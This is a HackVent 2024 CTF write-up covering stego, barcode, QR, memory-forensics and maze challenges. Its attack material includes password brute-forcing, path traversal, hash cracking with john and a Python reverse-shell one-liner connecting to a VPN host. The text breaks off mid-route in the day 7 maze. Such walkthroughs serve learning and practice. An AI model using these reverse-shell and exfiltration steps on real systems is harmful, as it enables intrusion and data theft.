0% found this document useful (0 votes)

59 views123 pages

HackVent 2024 WriteUp

The HackVent 2024 write-up details various challenges faced by participants, including tasks related to steganography, QR code manipulation, and password cracking. Each challenge provides a unique scenario where participants must analyze data, decode messages, or exploit vulnerabilities to retrieve flags. The document includes specific solutions and flags for each challenge, showcasing the problem-solving techniques used throughout the event.

Uploaded by

daubsi

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

59 views123 pages

HackVent 2024 WriteUp

Uploaded by

daubsi

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 123

HackVent 2024 Write-Up

by @daubsi, 27.12.2024

Table of Contents
[HV24.01] Twisted Colors ..................................................................................... 3
[HV24.02] Meet me at the bar ............................................................................... 5
[HV24.03] PowerHell: .......................................................................................... 7
[HV24.04] Missing QR .......................................................................................... 9
[HV24.H5] Last Password................................................................................... 12
[HV24.06] Chimney Windows ............................................................................. 17
[HV24.07] Happy Mazemas ................................................................................ 20
[HV24.08] Santa's Handwriting ........................................................................... 26
[HV24.09] Naughty and nice ............................................................................... 30
[HV24.10] Santa's Naughty Little Helper ............................................................. 40
[HV24.11] Christmas Dots ................................................................................. 53
[HV24.12] Santa's Proxy Puzzle .......................................................................... 57
[HV24.13] Server Hypervisor .............................................................................. 80
[HV24.14] Santa's Hardware Encryption ............................................................. 83
[HV24.15] Rudolph's Symphony ......................................................................... 86
[HV24.16] Santa's Signatures ............................................................................. 96
[HV24.17] Santa's Not So Secure Encryption Platform ....................................... 102
[HV24.18] Santa’s Sego.................................................................................... 106
[HV24.19] Santa's Workshop: A Technical Emergency ....................................... 108
[HV24.20] Santa's Modular Calculator .............................................................. 110
[HV24.21] Silent Post ....................................................................................... 112
[HV24.22] Santa's Secret Git Feature ................................................................ 115
[HV24.23] Santa's Packet Analyser ................................................................... 117
[HV24.24] Stranger Sounds .............................................................................. 118
[HV24.HE] Grinch’s secret ............................................................................... 119
[HV24.HM] Mrs Claus’s Secret ......................................................................... 120
[HV24.HH] Frosty's Secret ............................................................................... 121
[HV24.01] Twisted Colors

An elf accidentally mixed up the colors while painting the Christmas ornaments. Can you help
Santa ﬁx it?

Analyse the GIF and get the ﬂag.

Flag format: HV24{}

sha256sum of the GIF

ﬁle: 0c85246d9c94411ca3292d388f4959054036b7d5cc4c7e2cf07fd7315e86aa69

Solution:

Using various steganography tools didn´t provide anything helpful apart from that we see that
something is o in the bitplanes 0 and 1 when loading it in stegsolve.jar

Unfortunately, this was a deadend. Using exiftool we see that it’s a paletted image, so let’s use
gimp to look at the palette (Windows->Dockable dialogs->Colormap)

What we see here is a dark blue and black at the end

When we exchange the two colormap entries (from 00000 to

and v.v.)
suddenly the QR code changes to this:

and we get a new ﬂag:

daubsi@t14:~$ zbarimg 04ab832f-50dd-4dea-a834-e0a34fa625b5_2.gif
QR-Code:HV24{Tw1st3d_c0lors_4re_fun!}
scanned 1 barcode symbols from 1 images in 0,01 seconds
Flag: HV24{Tw1st3d_c0lors_4re_fun!}
[HV24.02] Meet me at the bar

Introduction

December. Nightshift at Santa's gift factory. Gifts still to be wrapped are starting to pile up as
they cannot be processed any further. One elve still on duty sent Santa some pictures asking for
help as all the other elves are already celebrating at the bar. The elve has problems decrypting
the pictures as it is still learning the alphabet.

Hint #1: Not all bars but only the missing ones are needed to retrieve the ﬂag. "HV24{" and "}"
are not part of the barcodes.

Analyze the images and get the ﬂag.

Flag format: HV24{}

sha256sum of the
attachment: cdf6da7570730dfeed9eabb21bfc438cf594b54b24599a67c7b6f41718098fd8

We receive a zip archive with some EAN 8 bar code images which are broken

For example we get this image:

It is evident that one value is missing in all those images.

Using the information from:

https://de.wikipedia.org/wiki/European_Article_Number

https://barcode-coder.com/en/ean-8-speciﬁcation-101.html

we can derive the missing values/bars for each image. The left part is always 1337 for every
image.
Completing every code (a graphic program with a grid makes it easier to overlay and count the
bar widths) according to the CRC algorithm gives us the following numbers from the missing
bars:

1,2,5,2,0,9,2,0,1,9,1,4,1,5,2,3

Now it needs to be considered that for some images we have to bar codes and for some only
one.

For the images with two codes we need to combine the digits: 12, 5, 20, 9, 20, 19, 14, 15, 23

Those digits are the indexes into the alphabet: 12 = l, 5 = e, 20 = t, ..

Flag: HV24{letitsnow}
[HV24.03] PowerHell:

Introduction

Oh no! The devil has found some secret information about santa! And even worse, he hides
them in a webserver written in powershell! Help Santa save christmas and hack yourself into the
server.

Start the resource and get the ﬂag.

In case you encounter any issues during solving, please try to connect via the HL VPN

Flag format: HV24{}

sha256sum of the
handout: 3f8fe367efd41d17047642496260cbc97313ccc19484be151d4b07556d9b342a

In this challenge we’re given a powershell webserver with some simple authentication workﬂow
param($request, $response)

$username = $request.QueryString["username"]
$password = $request.QueryString["password"]

if (Test-Path "passwords/$username.txt") {
$storedPassword = Get-Content -Raw -Path "passwords/$username.txt"
$isAuthenticated = $true

for ($i = 0; $i -lt $password.Length; $i++) {

if ($password[$i] -cne $storedPassword[$i]) {
$isAuthenticated = $false
Start-Sleep -Milliseconds 500 # brute-force prevention
break
}
}

if ($isAuthenticated) {
if ($username -ceq "admin") {
$response.Redirect("/admin?username=$username&password=$password")
} else {
$response.Redirect("/dashboard?username=$username&password=$password")
}
} else {
. ./helpers.ps1 $response "<h1>Invalid password :c</h1>" "text/html"
}
} else {
. ./helpers.ps1 $response "<h1>User not found :c</h1>" "text/html"
}

What catches our eye is that the for loop where the pw characters are checked startes with
isAuthenticated set to true and waits for 500ms once a wrong character was entered. Also if the
pw is correct it redirects to the /admin page.

If the pw is actually empty we’ll as well get redirected to the admin page, but there the pw is
checked again and you get rejected.
So what we can do is feed once char at a time into the checker, bruteforcing every char with
ascii printable and check if we eventually hit the redirect to the /admin page. We know then, that
SO FAR the pw is correct. We can easily set this up with BURP intruder and manually add every
correct char to the input once we retrieve a status code 302 in the response.

Using this approach we can quickly ﬁnd the PW “Meow:3” for the admin user, but… how sad:

There must be something else. The PW check is legit so we have no option here… but some…
RCE or LFI maybe? Quickly searching for where Get-Content is used, we see that actually the
password file is read according to the username! What if we… specify flag.txt as the username
and brute our flag using the same approach?

flag.txt unfortunately gives us “no such user” but once we specify “../flag.txt” as the username
we can use the same approach as before and BF the flag one by one…

And with some patience we get:

Flag: HV24{dQw4w9WgXcQ}
[HV24.04] Missing QR

Introduction

Oh my Santa, the same elf who once messed up the color table did it again. But this time he
seems to have been interrupted while painting the Christmas ball. Maybe you can help Santa
ﬁnish his job?

Solution:

Todays challenge picture looks almost like the one we had before on day1 and when we XOR
both images we get an interesting pattern:

We can clearly see a 4th marker in the lower right corner.

Massaging the pixeldata a big with XOR and AND, we can eventually end up with the following
bitstream, which when put into cyberchef gives us an interesting message. (“Fill in:”)
If we lay a grid over our existing QR code we can see that 5x is one grid step and we have exactly
15 pixels in between the markers. Doing the math with out bit stream without the preﬁx “Fill in:”,
this pretty good ﬁlls the QR code.

So lets have Chat GPT write a small program which worked right away:

https://chatgpt.com/share/67503fa9-4330-8002-a092-9165b22ef199
from PIL import Image

def fill_qr_code(image_path, bitstream_path, output_path):

# Load the image
img = Image.open(image_path)
img = img.convert("RGB") # Ensure the image is in RGB mode

# Verify image size

width, height = img.size
if width != 29 or height != 29:
raise ValueError("Image must be 29x29 pixels.")

# Read the bitstream from the file

with open(bitstream_path, "r") as f:
bitstream = f.read().strip()

# Convert bitstream to a list of integers

bits = [int(bit) for bit in bitstream]

# Create a pixel map

pixels = img.load()

# Define marker size

marker_size = 7 # 7x7 markers in corners

# Index for the bitstream

bit_index = 0

# Fill the white area with the bitstream

for y in range(29):
for x in range(29):
# Skip the top-left, top-right, and bottom-left markers
if (x < marker_size and y < marker_size) or \
(x >= 29 - marker_size and y < marker_size) or \
(x < marker_size and y >= 29 - marker_size):
continue

# Skip existing black pixels (marker borders)

if pixels[x, y] == (0, 0, 0):
continue
# Apply the bitstream
if bit_index < len(bits):
color = (0, 0, 0) if bits[bit_index] == 1 else (255, 255, 255)
pixels[x, y] = color
bit_index += 1

# Save the filled image

img.save(output_path)

# Example usage
if __name__ == "__main__":
# Input image path (with only markers)
input_image_path = "input_qr_code.png"

# Bitstream file path (one long sequence of 1s and 0s)

bitstream_file_path = "bitstream.txt"

# Output image path

output_image_path = "output_qr_code.png"

# Run the function

fill_qr_code(input_image_path, bitstream_file_path, output_image_path)
print(f"Filled QR code saved to {output_image_path}")

and generated the following QR code.

Recognizing the ﬂag with zbarimg requires a 1px white border around everything, scanning with
the smart phone works like it is.

Flag: HV24{QR_$tu _h1dd3n_in_th3_c0lor_t@b1e}

[HV24.H5] Last Password

Introduction

Last Password, I gave you away and the very next day, all my accounts where astray. This year to
save me from tears, I'll give it to no one.

Please use the download mirrors ﬁrst to not put too much stress on the HL infrastructure.

Download
mirror: https://1drv.ms/u/c/0ee8a2263bd035f8/EQlBzcb6TMVKq42ODwd482wBSFPlUQ9QRAU
WF97AmItunA?e=F7aMWc

Download mirror: https://goﬁle.io/d/utChqZ

Analyze the ﬁle and get the ﬂag.

Flag format: HV24{}

sha256sum of last-
password.zip: 84d0d36db1c5f4dfc63286d9f28ee9d852fdbbe8d99890d993b413372bcb6150

sha256sum of dump.raw: eedb621a62393714dfc04b6cdf8654c8b4cb3d20dc0b9 144 922bee

b3268e

We can unpack this dump image and run volatility3 on it.

$ vol -f ../ch5/dump.raw windows.pstree | less -S

lists us all processes…

So we have notepad, so ice, winrar, … (An open youtube link in a browser, that we won’t fail for
;-) )
Winrar references a ﬁle secret.7z. Now this looks interesting. Let’s try to get it
$ vol3 vol -f ../ch5/dump.raw windows.filescan.FileScan | grep secret
0xc08339350e20.0\Users\xtea418\Documents\Personal\secret.7z
0xc0833cb64b40 \Users\xtea418\Documents\Personal\secret.7z
0xc0833cb65e00 \Users\xtea418\Documents\Personal\secret.7z

$ vol3 vol -f ../ch5/dump.raw windows.dumpfiles --virtaddr 0xc08339350e20

Volatility 3 Framework 2.8.0
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result

DataSectionObject 0xc08339350e20 secret.7z Error dumping file

SharedCacheMap 0xc08339350e20 secret.7z
file.0xc08339350e20.0xc08338120a20.SharedCacheMap.secret.7z-2.vacb

$ 7z x file.0xc08339350e20.0xc08338120a20.SharedCacheMap.secret.7z-2.vacb

7-Zip (z) 23.01 (arm64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
64-bit arm_v:8 locale=en_US.UTF-8 Threads:12 OPEN_MAX:65535, ASM

Scanning the drive for archives:

1 file, 262144 bytes (256 KiB)

Extracting archive: file.0xc08339350e20.0xc08338120a20.SharedCacheMap.secret.7z-

2.vacb

Enter password:ffff

ERROR: file.0xc08339350e20.0xc08338120a20.SharedCacheMap.secret.7z-2.vacb
Cannot open encrypted archive. Wrong password?

Can't open as archive: 1

Files: 0
Size: 0
Compressed: 0

Hm… now this is deﬁnitely something…

In past challenges often notepad.exe holds some infos. Unfortunately vol3 does not have a
plugin for extracting notepad.exe contents, but Volatility plugin contest to the rescue!

https://medium.com/@rifqiaramadhan/volatility-3-plugin-kusertime-notepad-sticky-evtxlog-
f0e8739eee55

We install the notepad.py plugin:

cp vol3-plugins/*.py .venv/lib/python3.13/site-
packages/volatility3/plugins/windows/

And run it
vol3 vol -f ../ch5/dump.raw windows.notepad.Notepad

Volatility 3 Framework 2.8.0

Progress: 100.00 PDB scanning finished

PID Image Probable Strings

7900 notepad.exe 0 5 ` ` l 3 ( $ $ * , 0 =::=::\
ALLUSERSPROFILE=C:\ProgramData APPDATA=C:\Users\xtea418\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files CommonProgramFiles(x86)=C:\Program
Files (x86)\Common Files CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=DESKTOP-MB2MGE7 ComSpec=C:\Windows\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData

\BaseNamedObjects\[CoreUI]-PID(4160)-TID(4132) 1e6e6bc4-dd60-46b4-9e84-70f923d5629a
7 \BaseNamedObjects\[CoreUI]-PID(7900)-TID(7816) fc205108-f731-44a3-a019-
8c2b4cb39c88 8 8 8 8 Consolas nsole ER\S 435439-1930665703-3246598564-1001
` ` @ Security-SPP-GenuineLocalStatus ` ` D never gonna give you my last
password: t1s1s4t0t4llys3cur3p4ssw0rdn0rocky0utxt Consolas ( V i

Oh.. nice.. What’s that? A reference to rockyou? Could it be that simple?

~/john-tools/7z2john.pl ./
file.0xc08339350e20.0xc08338120a20.SharedCacheMap.secret.7z-2.vacb
file.0xc08339350e20.0xc08338120a20.SharedCacheMap.secret.7z-
2.vacb:$7z$1$19$0$$16$bbdbbf3fa3bf8efcdc05153543d31569$433149696$144$140$b0786fd9d9
562032270c06f5ce5a2b0f22c76b4bd6ed13b94da50d7c4756fa4c2cdb5c08b4d8a5ec26a7872bc076c
2b2ad88c31a5e153dd99658ba5825c22fba90ef6f2b30cfbdb8fb538980c15493a094c82576a8259822
b232c0c787f9481ea556ae50c51af6ea3016891025b44bc2c4c262a1d4a29afcddd080f65d747b47f78
a4b41aa35263a908d551789595f36$166$5d00100000

$ ~/john-tools/7z2john.pl ./
file.0xc08339350e20.0xc08338120a20.SharedCacheMap.secret.7z-2.vacb >
7z.hash
$ ~/john-tools/john rar.hash --wordlist=/opt/rockyou/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip [SHA256 128/128 AVX 4x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 4 for all loaded hashes
Cost 3 (compression type) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 0.00% (ETA: 2024-12-10 19:38) 0g/s 27.46p/s 27.46c/s 27.46C/s
samantha..family
0g 0:00:00:06 0.00% (ETA: 2024-12-11 15:15) 0g/s 29.62p/s 29.62c/s 29.62C/s
alyssa..jeremy
0g 0:00:00:27 0.01% (ETA: 2024-12-11 14:30) 0g/s 34.13p/s 34.13c/s 34.13C/s
xbox360..diamonds
0g 0:00:03:49 0.05% (ETA: 2024-12-10 15:48) 0g/s 40.08p/s 40.08c/s 40.08C/s
weedman..rubberducky
santa1 (ffffc0833cb65e00-secret.7z)
1g 0:00:07:30 DONE (2024-12-05 15:47) 0.002221g/s 40.06p/s 40.06c/s 40.06C/s
sooty1..pokemon123
Use the "--show" option to display all of the cracked passwords reliably
Session completed

$ 7z x file.0xc08339350e20.0xc08338120a20.SharedCacheMap.secret.7z-1.vacb

7-Zip (z) 23.01 (arm64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
64-bit arm_v:8 locale=en_US.UTF-8 Threads:12 OPEN_MAX:65535, ASM

Scanning the drive for archives:

1 file, 262144 bytes (256 KiB)

Extracting archive: file.0xc08339350e20.0xc08338120a20.SharedCacheMap.secret.7z-

1.vacb
Enter password:santa1

WARNINGS:
There are data after the end of archive

--
Path = file.0xc08339350e20.0xc08338120a20.SharedCacheMap.secret.7z-1.vacb
Type = 7z
WARNINGS:
There are data after the end of archive
Physical Size = 65264
Tail Size = 196880
Headers Size = 240
Method = LZMA2:96k 7zAES
Solid = -
Blocks = 1

Everything is Ok

Archives with Warnings: 1

Warnings: 1
Folders: 1
Files: 1
Size: 67260
Compressed: 262144

$ ls secret
image.jpg
$ open secret/image.jpg

$ exiftool secret/image.jpg
ExifTool Version Number : 13.00
File Name : image.jpg
Directory : secret
File Size : 67 kB
File Modification Date/Time : 2024:11:24 15:42:51+01:00
File Access Date/Time : 2024:12:05 16:07:07+01:00
File Inode Change Date/Time : 2024:12:05 16:07:06+01:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
XMP Toolkit : Image::ExifTool 13.03
Description :
HV24{t0t4lly_s3cur3_p4ssw0rd_l1k3_4ctu4lly_s0_v3ry_much_s3cur3}
Image Width : 500
Image Height : 500
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 500x500
Megapixels : 0.250

Flag: HV24{t0t4lly_s3cur3_p4ssw0rd_l1k3_4ctu4lly_s0_v3ry_much_s3cur3}
[HV24.06] Chimney Windows
Introduction

Santa has seen it. He is done with Linux - it's just too hard. So he installed Windows. Sadly, he
also lost his ﬂag while doing so. Help him ﬁnd it.

Hint: Ctrl+Z and stty raw -echo; fg helps ﬁx the VM console.

Start the service and get the ﬂag.

Flag format: HV24{}

Todays challenge looks like a normal Windows shell and there’s barely nothing on that box apart
from a rick-rolling notes.txt

However, when we execute the start /? command we see this:

✘ daubsi@bigigloo  ~  ncat 152.96.15.7 5000
=======================
HV24 VM instancer
=======================

Please wait while we create your VM...

Your VM is ready!
Press enter, if you don't see any prompt.
Microsoft Windows 10.0.19043

C:\users\santa>^Z
[1] + 2392384 suspended ncat 152.96.15.7 5000
✘ daubsi@bigigloo  ~  stty raw -echo; fg
[1] + 2392384 continued ncat 152.96.15.7 5000

C:\users\santa>start

C:\users\santa>start /?
Start a program, or open a document in the program normally used for files
with that suffix.
Usage:
start [options] program_filename [...]
start [options] document_filename

Options:
"title" Specifies the title of the child windows.
/d directory Start the program in the specified directory.
/b Don't create a new console for the program.
/i Start the program with fresh environment variables.
/min Start the program minimized.
/max Start the program maximized.
/low Start the program in the idle priority class.
/normal Start the program in the normal priority class.
/high Start the program in the high priority class.
/realtime Start the program in the realtime priority class.
/abovenormal Start the program in the abovenormal priority class.
/belownormal Start the program in the belownormal priority class.
/node n Start the program on the specified NUMA node.
/affinity mask Start the program with the specified affinity mask.
/wait Wait for the started program to finish, then exit with its
exit code.
/unix Use a Unix filename and start the file like Windows
explorer.
/ProgIDOpen Open a document using the specified progID.
/? Display this help and exit.

Which mentions “wine” :-O

Using that information we try to run a UNIX command and indeed:

C:\users\santa>start /exec /bin/ls /

C:\users\santa>bin entrypoint.sh home lib64 mnt root srv usr

boot etc lib libx32 opt run sys var
dev flag.tar.gz lib32 media proc sbin tmp

C:\users\santa>start /exec /usr/bin/zgrep -a HV24 /flag.tar.gz

IHDRusO#tEXtCommentHV24{w41t_1t5_4ll_l1nux???}_ua IDATx[v$I-
7<HfUW?νKҗF?-MC&(}+ds
b#<lpHR(R$w?ww;;Լ8H|HqqS3w7W0˼0>

cԋz,pҚ̡/gx<T=t?wKgL2u&uy
Ӵ
ww[ty
#^
쨻K֚
xb
ws4SUU3x[]|`‫ޝ‬xweNR?Ȣzs>u~.>)g')yB#H4BH4B0+L}x='^r
zXI$ďPHr,w3s7sgs&J)Qo*7nI"M?jOI:^Hk"$
`V$9XY +,'\za%%+Kz‫ﭷ‬Zo5B 840yiҤ8gF?%!i
s"6"\DP83༦b:f㣼
zw녚w8_Fcl?38.!_(ip*ƀ?CA
bEŕ{4)&)wG:cCM]5$‫ل‬g2WKVnAJFXkmzN/콾X,7 O䉵

uGBR4ȵVzϻKr#&Hm.ַ
M

It would be implausible to say I solved it that fast. Indeed I went down quite a rabbit hole:
C:\users\santa>start /unix /usr/bin/tar xzf /flag.tar.gz -C /home/santa

The main problem was, that the shell did not actually spit out anything to stdout with /unix
which I originally tried all the time. All the attempts with redirecting stdout to stderr via 1>&2
failed so the last resort was a reverse shell which luckily worked, because python was installed.

Of course we need to connect to the HL VPN ﬁrst.

start /unix /usr/bin/python3 -c "import pty;import socket,os;s=socket

.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('<vpn address>',4444));o

s.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin

/bash')"

This command is the usual to be found command in the internet, e.g. here
https://gist.github.com/lucasgates/0c6330c582d0ccf52fad129d5e7e9de7
with the di erence that we had to switch ‘ and “ in the command to make it work.

I started a nc on my Kali box and had a reverse shell which certainly made things much simpler.
There is no nc nor ncat installed on the box so I downloaded a static nc from
https://github.com/yunchih/static-binaries/blob/master/nc and hosted it on my Kali box with a
python3 web server (-m http.server) and then downloaded into the container with wget,
because wget was readily available.

Then it was a matter of exﬁl via nc to the Kali box and looking at the picture which rickrolled you
again, but the exifdata showed the ﬂag:

Flag: HV24{w41t_1t5_4ll_l1nux???}
[HV24.07] Happy Mazemas
Introduction

A clumsy elf lost all the gifts in a magical maze right before Christmas Eve. Now, with time of the
essence, Santa must navigate this maze, collecting every gift in the most optimal way - the
shortest path possible - to save Christmas. Can you guide him to gather all the gifts and reach
the exit before it's too late?

Solution:

This is a classical maze solver problem over the network. We have to find the shortest path in a
maze for collecting all the gifts and then finding the exit. The problem is, that the server side
finds the perfect shortest route and you need to find that one too. Plus you have to do all this
within one minute.

I came up with this code. It is NOT optimal and WONT ﬁnd the perfect route everytime, but after
5-10 iterations the ﬂag drops eventually.
import heapq
import re
from collections import deque
from pwn import remote

# Helper function to check if a move is valid (not hitting a wall or out of bounds)
def is_valid_move(grid, position):
"""Check if the position is within the bounds of the grid and not a wall."""
y, x = position
if y < 0 or y >= len(grid) or x < 0 or x >= len(grid[0]):
return False
return grid[y][x] != '#'

# BFS function to find the shortest path from start to goal

def bfs_shortest_path(grid, start, goal):
"""Breadth-first search to find the shortest path from start to goal."""
queue = deque([(start, [])])
visited = set([start])
while queue:
(current, path) = queue.popleft()
if current == goal:
return path # Return the path only
y, x = current
for dy, dx, move in [(-1, 0, 'w'), (1, 0, 's'), (0, -1, 'a'), (0, 1, 'd')]:
new_pos = (y + dy, x + dx)
if is_valid_move(grid, new_pos) and new_pos not in visited:
visited.add(new_pos)
queue.append((new_pos, path + [move]))
return [] # Return an empty list if no path is found

# Greedy TSP approach to visit all gifts

def tsp_greedy(grid, start, gifts):
"""Greedy approach to solve the TSP problem for visiting all gifts."""
unvisited = set(gifts)
current_position = start
path = []

while unvisited:
# Find the nearest target using BFS
nearest_target = None
shortest_path = None
for target in unvisited:
path_to_target = bfs_shortest_path(grid, current_position, target)
if nearest_target is None or len(path_to_target) < len(shortest_path):
nearest_target = target
shortest_path = path_to_target

# Add the path to the nearest target to the route

path.extend(shortest_path)
current_position = nearest_target
unvisited.remove(nearest_target)

return path

# Function to extract the maze from server response using regex

def extract_maze(data):
"""Extracts the maze portion from the server response."""
# Regex to match the maze part, this will match the grid and exclude the
headers.
maze_regex = r"(?:#.*\n)+"
match = re.search(maze_regex, data, re.DOTALL)
if match:
maze_string = match.group(0).strip().splitlines()
return [list(row) for row in maze_string][:-1]
return []

# Function to solve the maze, collect gifts and then go to exit

def solve_maze_with_tsp(grid, start, gifts, exit):
"""Solves the maze by first collecting all gifts and then going to exit."""
# Step 1: First collect all the gifts, using the greedy approach
route_to_collect_gifts = tsp_greedy(grid, start, gifts)

# Step 2: Recompute the final position after collecting all gifts

current_position = start
for move in route_to_collect_gifts:
if move == 'w':
current_position = (current_position[0] - 1, current_position[1])
elif move == 's':
current_position = (current_position[0] + 1, current_position[1])
elif move == 'a':
current_position = (current_position[0], current_position[1] - 1)
elif move == 'd':
current_position = (current_position[0], current_position[1] + 1)

# Step 3: Now, after collecting all gifts, go to the exit

route_to_exit = bfs_shortest_path(grid, current_position, exit)
# Combine the paths: first the gifts, then the exit
return route_to_collect_gifts + route_to_exit

# Function to parse and solve the maze from the server

def solve_remote_maze(remote_ip, remote_port):
"""Connects to the server, solves the maze, and sends the solution back."""
# Connect to the remote server
connection = remote(remote_ip, remote_port)

# First receive and print the welcome header

data = connection.recvuntil(b"Move (w/a/s/d):").decode()

while True:
print(data)
# Extract the maze
grid = extract_maze(data)
if not grid:
print("Failed to extract maze!")
break

# Find positions: start (s), gifts (x), and escape (e)

start = None
gifts = []
escape = None
for y in range(len(grid)):
for x in range(len(grid[0])):
if grid[y][x] == 's':
start = (y, x)
elif grid[y][x] == 'x':
gifts.append((y, x))
elif grid[y][x] == 'e':
escape = (y, x)

# Solve the maze and get the path

path = solve_maze_with_tsp(grid, start, gifts, escape)

# Send each move to the server one at a time

print(f"Optimal route: {''.join(path)}")
print(f"Current: ", end='')
for idx, move in enumerate(path):
connection.sendline(move.encode())
print(move,end='')
try:
data = connection.recvuntil(b"Move
(w/a/s/d):").decode()
except:
print(connection.recv(timeout=1).decode())
exit()
if idx == len(path):
print(data)

print("")
# After reaching the escape, wait for a new maze or exit message
if "him through once more." or "assist him again" in data:
print("Completed maze, receiving new maze.")
else:
print("Exiting game.")
break

# Example usage
if __name__ == "__main__":
# Connect to the remote server and solve the maze
remote_ip = "157.90.230.139" # Replace with the actual IP address
remote_port = 8000 # Replace with the actual port
solve_remote_maze(remote_ip, remote_port)

Transcript:

Ho Ho Ho! It's Merry Mazemas!

Guide Santa through the maze to collect all the gifts in the most efficient way
possible before exiting.
s = Santa
x = Gift
e = Exit
###########
#s# #
# ##### # #
# #e# #
##### ### #
#x # # #
# ##### # #
# x# #
# ####### #
# #
###########
Move (w/a/s/d):
Optimal route: ssddddssddssaaaaaawwssssddddddddwwwwwwwwaass
Current: ssddddssddssaaaaaawwssssddddddddwwwwwwwwaass
Completed maze, receiving new maze.

Congratulations! You've masterfully guided Santa through the maze, collecting every
gift with the perfect path!
Oh no, it seems the exit has led Santa into yet another maze! Please lend a helping
hand to guide him through once more.
#########################
#s # # #x # #
### # # # # #####x# # # #
# # # # # # # # # # #
# # # ##### # # # ### # #
# # # # # # x # # #
# ### # # ##### # # # # #
# # # # # # # # #
# ##### ### # ######### #
# # # # #
######### ######### # # #
# x# # # # #
### # # ### # # ####### #
# # # # # # #
# ### ### # # ###########
# # # # # #e # #
# ### ##### # ### # # # #
# # # # # # #
# # ####### # # ####### #
# # # # # # # #
# # # # ### ##### # #####
# # # # # # #
# # ############### ### #
# # #
#########################
Move (w/a/s/d):
Optimal route:
ddssssaassssddddddwwwwaawwwwddssddwwddssssddwwddssssaassddddddssddwwddwwwwwwwwaasss
sssaawwaawwwwaaaaddddssssddssddwwwwwwddssssssssssssaaaaaaaawwaassssssssddwwddwwddss
ddwwddssssaaaassssaaaaaaaaaaaaaaaawwwwwwaawwwwddwwddaassaassssddssssssddddddddddddd
dddwwwwddddwwwwaassaawwaaaa
Current:
ddssssaassssddddddwwwwaawwwwddssddwwddssssddwwddssssaassddddddssddwwddwwwwwwwwaasss
sssaawwaawwwwaaaaddddssssddssddwwwwwwddssssssssssssaaaaaaaawwaassssssssddwwddwwddss
ddwwddssssaaaassssaaaaaaaaaaaaaaaawwwwwwaawwwwddwwddaassaassssddssssssddddddddddddd
dddwwwwddddwwwwaassaawwaaaa
Completed maze, receiving new maze.

Congratulations! You've masterfully guided Santa through the maze, collecting every
gift with the perfect path!
Oh dear, the exit has whisked Santa away to another maze! Could you kindly assist
him again?
###################################################
#s# # # # # # #
# ### ### ##### ### ### ##### ##### # ##### ### # #
# # # # # # # # # # # # # #
### # ########### # # ### # ##### # # # # ### ### #
# # # # # # x # # # # # # # #
# # ### ######### # ######### # ####### ### ### # #
# # # x # # #x# # # # # # #
# ### ### ##### ##### # ### # ### # # # # ### ### #
# # # # # # # # # # # # # # # #
# ##### ##### ### ### # # ### ### # # # ####### # #
# # # #e# # # # # # # # #
# ####### ### # ### ##### # ########### # ### # ###
# # # # # # # # # # #
##### ### # ### # ### ######### ######### ####### #
# # # # # # # x# # #
# # ### ########### # # ######### ####### # #######
# # # # # # # # # # # # #
### ### # ##### # ####### # # # ####### ### # ### #
# # # # # # # # # # # # #
# ### ##### # ########### ### ##### # # # ####### #
# # # # # # # # # # # #
# ##### # # # ######### ### # ##### # # ####### # #
# # # # # # # # # # # #
############# ##### # # ######### # # ##### ##### #
# # # # # # # # # # # # #
# # # # # # ### # # ######### # ####### ### # #####
# # # # # # # # # # x # # #
# ##### ######### ### # ### ##### # # ######### # #
# # # # # # # # # # # # #
# ### ##### ### ### # ### # # # # ##### # ### ### #
# # # # # # # # # # # # # # # # #
# # ### ##### ##### # ### # # # # # # ### # #######
# # # # # # # # # # # # # # # # #
### # ##### # # # ### # ####### ### ### # # # ### #
# # # # # # # # # # # # # # #
# ##### # ##### ####### ### # # # ### ########### #
# # # # # # # # # # #
# # ####### # # # ### # # ##### ##### # # # ##### #
# # # # # # # #x# # # # # # # # # # #
# ### ### # # # # # ##### # # ### # # # ##### # ###
# # # # # # # # # # # # # # # # # #
### ### # ##### # # ### # # ### # # # # # # # ### #
# # # # # # # # # # # # # # # # #
# ### ### # ##### # ### # ### # # # # ##### #######
# # # # # # # # # # # # # #
# # ### ######### # # # #x##### ### ##### # ##### #
# # # # # x# # # # # # # # # #
# ### # # # # ####### # ##### ########### ### # # #
# # # # # # #
###################################################
Move (w/a/s/d):
Optimal route:
ssddssssddssddssaaaaaassddddssddssssaassaaaassddddddwwddssddwwwwaawwddddddssddwwddw
waawwddwwaawwaawwaaaaaaaawwaawwwwddddssddddddwwddddssssssddssssddwwwwddddssaassssaa
aassssddwwddddddddwwddddddddwwwwwwwwwwddssddssaassddddwwddwwaawwaawwaaaaaassssaawww
waaaaaassddddssaassddssssaaaawwwwwwaawwaassaaadddwwddssddssssssddddwwwwaawwddwwaaaa
wwddddddssssddwwwwddddddddddssddssssssssaassddssaaaaaassssaassddddddssddssaaaassdds
sddssaaaawwaaaassssssaawwaawwaassssaassddddssssssssddddssssaaaaaaaaaaaawwaaaawwwwww
wwwwddwwddssddwwwwwwwwaassssaawwwwwwaaaassddssssaassssssaawwaaaassssssssssaaaassddd
dddddwwwwddwwwwaaaawwssddddssssaassssaaaaaaaaaawwaassaawwwwddwwwwwwaaaassddssaassaa
ssddssaaaawwwwwwddwwaawwwwwwddwwwwddwwaaaawwwwddssddwwddssssddddssddssssaawwaaaaaas
